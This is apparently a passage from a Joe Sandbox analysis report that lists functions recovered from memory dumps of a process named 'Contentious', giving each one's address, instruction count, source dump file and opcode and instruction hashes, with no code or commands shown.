                                            • Opcode Fuzzy Hash: 93895a614e7cb355bdd36038c0bbbb62d79595a9556e4c37cc72923dca0bf02c
                                            • Instruction Fuzzy Hash: A551B475E01208CFCB09DFA9D49499DBBF2FF89311B209069E819AB324DB35AD46CF40
                                            Function 00159A63 Relevance: .1, Instructions: 127COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8dd34e38c4694dfd41ec3f138d5c85834c53955a06803b6e8b71120d77e0fc51
                                            • Instruction ID: 05bfb6c9a571df5526f39333e6d9a3fdcdb6d419f0191f70a1f2237b94c9d711
                                            • Opcode Fuzzy Hash: 8dd34e38c4694dfd41ec3f138d5c85834c53955a06803b6e8b71120d77e0fc51
                                            • Instruction Fuzzy Hash: 6951AE31A04289DFCF15CFA4D844A9EBFB2AF49311F148196EC659F2A1D334D958CBA2
                                            Function 00154DC8 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 995a98a2cb7e332ae51f63e1f20177399941fab79e567425fdbd28a46b12251d
                                            • Instruction ID: 6e5912fd9f4a2371edf489826049be88979552f35a0d736a9dcb796f0e48da1a
                                            • Opcode Fuzzy Hash: 995a98a2cb7e332ae51f63e1f20177399941fab79e567425fdbd28a46b12251d
                                            • Instruction Fuzzy Hash: 2E316F31604109EFCF059F64D855AAE3BB6FF88305F108424FD298B291CB38DDA5DBA1
                                            Function 001576D0 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e8121f3bc0f74022b82c1644cdf22952d19f62c1dbebf1732c8d04563f69324
                                            • Instruction ID: fb364dd59ab84d8be67b353561b7989c40b8d9db06d69987757eb2b44a673253
                                            • Opcode Fuzzy Hash: 3e8121f3bc0f74022b82c1644cdf22952d19f62c1dbebf1732c8d04563f69324
                                            • Instruction Fuzzy Hash: 0F21D3353082018FDB151735BC99A393AA79FC971A71840B9D919CF7D5EF24CC8A93C1
                                            Function 0015A809 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f599d6c4e1a3a3cbf0eaf134e5269f4f304d507348405173504f12ae44c05f6c
                                            • Instruction ID: aec0f3b47db49ac4329b4bcc2df8e949179df43686a25cdaa52c9243cf96f53b
                                            • Opcode Fuzzy Hash: f599d6c4e1a3a3cbf0eaf134e5269f4f304d507348405173504f12ae44c05f6c
                                            • Instruction Fuzzy Hash: 7F31B070A402198FCB04CF69C8849AEBBF2BF89315B158259E9259B3B1CB349D46CB91
                                            Function 001576E0 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8233705335340c9c9e62822e874e6acde37368e13a9b81776dc118d0cb500eef
                                            • Instruction ID: f1051db1d36e4a89e18c7b1747ca63b4797ae3566e2b724c8617768c9ac561e1
                                            • Opcode Fuzzy Hash: 8233705335340c9c9e62822e874e6acde37368e13a9b81776dc118d0cb500eef
                                            • Instruction Fuzzy Hash: 7B21A4353082008BEB141625F859A7A369B9FC871AF1440B4D91ACF7D4EF65CC8693C1
                                            Function 00155A68 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7954a74cfbe2fdf6ff85c3a9764d3063f3ac131de06f884c7b0800c01b59abc
                                            • Instruction ID: d9ec35818e232471d44ace54259f56a7dc362595f9f12493c0803ea0a56a7946
                                            • Opcode Fuzzy Hash: f7954a74cfbe2fdf6ff85c3a9764d3063f3ac131de06f884c7b0800c01b59abc
                                            • Instruction Fuzzy Hash: 9621D034301911DFC7198B28C8A452EB7A3AFC5722B154268EC1ADF350CF20DC068BC0
                                            Function 00152060 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c4cd25f36f58b6f244d169a97d8630c5aed1914cd1d6ac77f464aa349b9e5bd
                                            • Instruction ID: a828fd8c97ef58c226ad4f649fe67825ef0f47b99feda43090a0e26bb6662d75
                                            • Opcode Fuzzy Hash: 3c4cd25f36f58b6f244d169a97d8630c5aed1914cd1d6ac77f464aa349b9e5bd
                                            • Instruction Fuzzy Hash: 0721B272A00115DFCB14DF74C4509AE77A5EB9A364B10C01DE85A9B280DB39EE46CBE2
                                            Function 000AD044 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2922646528.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_ad000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19c19e50b2e1ba2f01f8cc4e8727302870f604b73c297ae510d21d4728c546d4
                                            • Instruction ID: ef9fd44ab4bac6aec4dc9670c78a6ce76559cff663cb862fdbbce94d4814cbbe
                                            • Opcode Fuzzy Hash: 19c19e50b2e1ba2f01f8cc4e8727302870f604b73c297ae510d21d4728c546d4
                                            • Instruction Fuzzy Hash: 44212575604204AFCB10CF54C9C4F26BBA5FB95314F24CA6EE94A4B741C73AD846CA61
                                            Function 0015215C Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5bed8e755979b88d0b115b77e86ed9795db724ae84055f3d22fb0608edbc78fb
                                            • Instruction ID: e634557de78974ebf07a94e20bcd9dc17a68b2be8525a874a58073d77acf5985
                                            • Opcode Fuzzy Hash: 5bed8e755979b88d0b115b77e86ed9795db724ae84055f3d22fb0608edbc78fb
                                            • Instruction Fuzzy Hash: 4B115272E05359DFCB029BB89C104DEBB30FF863217258397E526BB091EA35190AC7D1
                                            Function 001539ED Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 493c223755346794dfd774069d7a2a5dc1c83b73fb31d64e3cc30e117d9a2fd0
                                            • Instruction ID: 0e023a4fdebafb180385eb1c0cc02ea63b2802f79be3181b06ed3cf74ba95df7
                                            • Opcode Fuzzy Hash: 493c223755346794dfd774069d7a2a5dc1c83b73fb31d64e3cc30e117d9a2fd0
                                            • Instruction Fuzzy Hash: 3C31C278E01308CFCB08DFA8D59499DBBB2FF49316B20406AE819AB320D735AD45CF40
                                            Function 00154DC5 Relevance: .1, Instructions: 64COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af76e5d95d455d7eb041d80a5fdb850afbbe15fbbb3537ac2d7de2238296ef30
                                            • Instruction ID: 38957336a54a49b02778488f5f5516e958bbcddf9d7248d6e47d49d793ff2716
                                            • Opcode Fuzzy Hash: af76e5d95d455d7eb041d80a5fdb850afbbe15fbbb3537ac2d7de2238296ef30
                                            • Instruction Fuzzy Hash: CC21B431604109DFCB159F64D455B6B3BB2FB8431AF108024F9198F291CB38DD95DBE0
                                            Function 20CB2898 Relevance: .1, Instructions: 64COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44bbc5861e4529ee20d16d9364bbb3c4699959e289b9b11e8b8e65800d5b3a81
                                            • Instruction ID: cc9d345b00185210cc4ebb01655692fb98f3e59ea8a95feb8b0129a301e0ce0b
                                            • Opcode Fuzzy Hash: 44bbc5861e4529ee20d16d9364bbb3c4699959e289b9b11e8b8e65800d5b3a81
                                            • Instruction Fuzzy Hash: F5119D767002048FC715DBA9D594E56B7E2FF88721F11846EE61ACB365CB72DC45CB10
                                            Function 0015D4C0 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c3d19c4310382ab7ca104dde135327593e2800f28e171a3b8fc295df9f43a0e0
                                            • Instruction ID: 07dfc7896d140a87c4434ce7ed0c8dc9da6af47a34b15c3c86c38f77cd177b8d
                                            • Opcode Fuzzy Hash: c3d19c4310382ab7ca104dde135327593e2800f28e171a3b8fc295df9f43a0e0
                                            • Instruction Fuzzy Hash: C0214970904219DFDB06DFB8C98169EBFF1FB85301F0085AAD0589B265EB781A4ACF91
                                            Function 20CB7B8C Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37966dff82e0add6db5f82b5704d64a49ef864832e578daf50e8a76cc5008912
                                            • Instruction ID: 916973327afef298f011981e089fc03f5de7bbd566e34e8b8d266ac32d3b9ba6
                                            • Opcode Fuzzy Hash: 37966dff82e0add6db5f82b5704d64a49ef864832e578daf50e8a76cc5008912
                                            • Instruction Fuzzy Hash: E2116DB4E011198FDB04DBE8D884EADBBF5BB88305F20D269E804AB342D731ED41CB50
                                            Function 00155A70 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51407afe462208e43b7cf64c84e452bc98057738ac90bd5da95fc8770b34d709
                                            • Instruction ID: 0a1581ff1763ce3604fd073a93329b6448339fb4eb237e2ae736197cc0294c53
                                            • Opcode Fuzzy Hash: 51407afe462208e43b7cf64c84e452bc98057738ac90bd5da95fc8770b34d709
                                            • Instruction Fuzzy Hash: 84118231701A12DFC7195B29C8A852E77A7AFC57627154168ED1ACF750DF20DC4687D0
                                            Function 20CB2E60 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 360014fefdb57ab50c62aeacd5fc4f19a101a5ce15fa69bb136f5e0adf02f412
                                            • Instruction ID: a29f302fa89054f12a09deeefd89d3185b824746fb5b9587228fe342c50e9f6a
                                            • Opcode Fuzzy Hash: 360014fefdb57ab50c62aeacd5fc4f19a101a5ce15fa69bb136f5e0adf02f412
                                            • Instruction Fuzzy Hash: 9F11C2B2E002158BCB50EFFAC88459EBBF2AF88211B544539D418E7308EB31DC42CBA1
                                            Function 0015D4D0 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1187c5886fca4b671f78022e0cfb840ef36ffdb3b2d4c0f6bc1efc720cafcdc1
                                            • Instruction ID: c2ae9b02e8e112a99731733c0fae814166052ee808bab7154fae681ff079a70e
                                            • Opcode Fuzzy Hash: 1187c5886fca4b671f78022e0cfb840ef36ffdb3b2d4c0f6bc1efc720cafcdc1
                                            • Instruction Fuzzy Hash: 38113A70D00219DFDB04EFB8C9816AEBBF2FB84302F0085A9D0189B315EB745A45CF81
                                            Function 000AD03F Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2922646528.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_ad000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f917b708bda7e5fdbfd4ba76e3cc8b275685cae915d7c58425fa312f621bd797
                                            • Instruction ID: f0a16de95d160650f56d0790bc002627d5218908454bc4dade64d3814d2014c6
                                            • Opcode Fuzzy Hash: f917b708bda7e5fdbfd4ba76e3cc8b275685cae915d7c58425fa312f621bd797
                                            • Instruction Fuzzy Hash: 7511D075504244DFCB11CF50C5C4B15BBA2FB45314F24C6AED84A4B652C33AD84ACF51
                                            Function 00151F08 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f77375ffd93e620ef5f3408bc060799ae36ccab688a0ce95e36626f34930c2fd
                                            • Instruction ID: 1a42b573b4c9169d3d28f0c40a25790b50debd63e926a6b5cf1bdffe1910bfa0
                                            • Opcode Fuzzy Hash: f77375ffd93e620ef5f3408bc060799ae36ccab688a0ce95e36626f34930c2fd
                                            • Instruction Fuzzy Hash: 56211A74D04609CFCB11DFA8D8485EDBFF0BF4A315F14416AD859BB260EB301985CBA1
                                            Function 00155607 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44fdb162ff74898a4a94c58f779c55949a07afb70a930b479db5076c95e14541
                                            • Instruction ID: ceef9479785222ee353e56dd36fb6cb00b2a9d331a950e6e9aad422cd948da86
                                            • Opcode Fuzzy Hash: 44fdb162ff74898a4a94c58f779c55949a07afb70a930b479db5076c95e14541
                                            • Instruction Fuzzy Hash: 8F01F571604144AFCB028E64D8206EE3FB7DFC9352B58807AF918DB291DB758C069BA1
                                            Function 20CB2C40 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e6964f764c626f0c8a6c1ca3dd157d59374bda0d1a7da58f2e725cc6f90fcbf
                                            • Instruction ID: 2c18ad85053436eb701386f502f0be7a0b6e5d1ab879b88964097965f1d10bca
                                            • Opcode Fuzzy Hash: 6e6964f764c626f0c8a6c1ca3dd157d59374bda0d1a7da58f2e725cc6f90fcbf
                                            • Instruction Fuzzy Hash: 3101B1366093844FCB065B7498644AE3F76EFD731071940ABE64ACB6A2DA648C4AC752
                                            Function 20CB28A0 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2621ee099ebbf4cb302013922e4074ac0c8ba4d7518108142f585e43e1f325c9
                                            • Instruction ID: 5830c2a34c68ba5ec67765c99c0e58470f0be7aa778bb3796cf20e360d813a83
                                            • Opcode Fuzzy Hash: 2621ee099ebbf4cb302013922e4074ac0c8ba4d7518108142f585e43e1f325c9
                                            • Instruction Fuzzy Hash: 98017C767002148FC714CBAAD598F16B7E6FF88721F10846DE6198B3A5CB71EC45CB10
                                            Function 20CB1650 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 884a398fdb9bb5c80bc57a259b93d28052d0570c906edae0ab922a9769059dd1
                                            • Instruction ID: e4d4e44216f102666991275749e51096ff1709f5595759a2dfad1c3d4f52c924
                                            • Opcode Fuzzy Hash: 884a398fdb9bb5c80bc57a259b93d28052d0570c906edae0ab922a9769059dd1
                                            • Instruction Fuzzy Hash: 4D014C75E001199FCB149FB9D8489AE7BF9EF88250B404439F91A97351DB348E908BA1
                                            Function 20CB1641 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 550c96c17125f92363c9e14ce3e6472af72ac8a51fe88cb00cd6a9f77d50774c
                                            • Instruction ID: b29d13f4bdd99b3ee957550d81643da81cdd3f600d8505b570e3ffe8733614fd
                                            • Opcode Fuzzy Hash: 550c96c17125f92363c9e14ce3e6472af72ac8a51fe88cb00cd6a9f77d50774c
                                            • Instruction Fuzzy Hash: 8F019E769001099FCB10DFA4DC449EF7FF5EF88210B004579F82993251DB318E91CB92
                                            Function 0015F688 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea500ab48b9d7be0520cae85622d2f4247e4fcd9f9c05483b691ecfc788706cb
                                            • Instruction ID: e5067178e36f60f81325987c351f748c98bb05b22b985cdd84ddf58ec6e1a03f
                                            • Opcode Fuzzy Hash: ea500ab48b9d7be0520cae85622d2f4247e4fcd9f9c05483b691ecfc788706cb
                                            • Instruction Fuzzy Hash: 8601DB306043540FC719AB39D89099A3BE3EFC0301B508E6DE04ACF6A7DE649D4E8BD1
                                            Function 0015F698 Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a51309fb4b770f5a3cf35b277fe550cc5e8ffcf85fdf2b7a6cef9efda006b8f0
                                            • Instruction ID: 8aef057560b1c0b297590b90cd1ade93932867587743b6db329f12f642cd8bb4
                                            • Opcode Fuzzy Hash: a51309fb4b770f5a3cf35b277fe550cc5e8ffcf85fdf2b7a6cef9efda006b8f0
                                            • Instruction Fuzzy Hash: 6BF04F302002144FC718AB3AD854A9B77D7EFC0712B508E28A44A8F66ADE60AD498BD1
                                            Function 20CB2F05 Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7f6d40b8dddccdd8966e809e4cd1c75ded4d168794d9999d5ecc1b5cc74646b
                                            • Instruction ID: a3708eb40335916d3350ea045dcb9e4540b1cd4be12ded433e676f6802f1410c
                                            • Opcode Fuzzy Hash: a7f6d40b8dddccdd8966e809e4cd1c75ded4d168794d9999d5ecc1b5cc74646b
                                            • Instruction Fuzzy Hash: 19F08272B085209FCB1547ADA414AAEBBB5DFC526171441BEE519D73A5CE72CC028B90
                                            Function 20CB2734 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be20e6bf83a24e9c5e3bdad14a48f079727b857e0b5602edfb864bbbe898936b
                                            • Instruction ID: 44009e0d8b6ee3efc2253e61f4ee3ae7ee38b41a31bf8ed569a27077a436805c
                                            • Opcode Fuzzy Hash: be20e6bf83a24e9c5e3bdad14a48f079727b857e0b5602edfb864bbbe898936b
                                            • Instruction Fuzzy Hash: E5F062B6E001149E8B54DFAA944199FBFF5EB98340B10462AE909D3241E77059068BA1
                                            Function 20CB2BF0 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c972ee384922b83936750706eceb146063a9defb1f20d367c0295a9b9fa5d05
                                            • Instruction ID: a11b7575015015981282313767d2a5484da3fcf4b6bb982a3107b583d6e1182d
                                            • Opcode Fuzzy Hash: 6c972ee384922b83936750706eceb146063a9defb1f20d367c0295a9b9fa5d05
                                            • Instruction Fuzzy Hash: 57F05835300205DFC700CF6AC888D5ABBEAFF88721B608169EA098B335CB71EC51CB80
                                            Function 00152010 Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad92a366439b06135d6f0b98b3cd4c49eda14ad54f043b1029b1d96c1db78949
                                            • Instruction ID: 55e755a9d8dcf39d026b531d6ec10406197709f0132b55251c7a299ef5709c11
                                            • Opcode Fuzzy Hash: ad92a366439b06135d6f0b98b3cd4c49eda14ad54f043b1029b1d96c1db78949
                                            • Instruction Fuzzy Hash: 99E09236D193965ECB039BB198104EEBF309DD3620B0642DBC0A5BB052EB601A4EC772
                                            Function 0015F586 Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b11c64dd0abef87c0a83862ba0301ff9248628e2283a9d8426db74dd9e1b6ef
                                            • Instruction ID: 742e3fff3204400ebc84b98b91e17e45476c7c7bcb4d05e9876d4b204e31f19e
                                            • Opcode Fuzzy Hash: 6b11c64dd0abef87c0a83862ba0301ff9248628e2283a9d8426db74dd9e1b6ef
                                            • Instruction Fuzzy Hash: 59F03AB1C1420ADFCB51DFB8845569E7FF0EF19204F6049AEC525EB252EB74424A8F81
                                            Function 20CB24D4 Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3177c1a0f71d23a033dfb6ed914a17f216ceb2593982d85fb4c4e1fc7e1772c0
                                            • Instruction ID: 4e50ec920122992fdec2fa5640bb457e5e681afc8b37f0c2bcb5c7dcb2966925
                                            • Opcode Fuzzy Hash: 3177c1a0f71d23a033dfb6ed914a17f216ceb2593982d85fb4c4e1fc7e1772c0
                                            • Instruction Fuzzy Hash: BBE04F327061209F87248A6DE894C9BBBA9EFC976531541BEE50ADB721CA71DC42CB90
                                            Function 0015F639 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe6f61a6b3c6d7a9b023cf4cff1c9c76784bbdafc9cc4a6e7fe6e05bd77e0631
                                            • Instruction ID: 6468ceeb1a03dc99a428e5ee688e846a5dbcd150b1343d970dcbe48d5262e5ab
                                            • Opcode Fuzzy Hash: fe6f61a6b3c6d7a9b023cf4cff1c9c76784bbdafc9cc4a6e7fe6e05bd77e0631
                                            • Instruction Fuzzy Hash: 21E086723083904BD751D3BCE4642C97B92DFD5355B1442BEE849DF29DEF108D899391
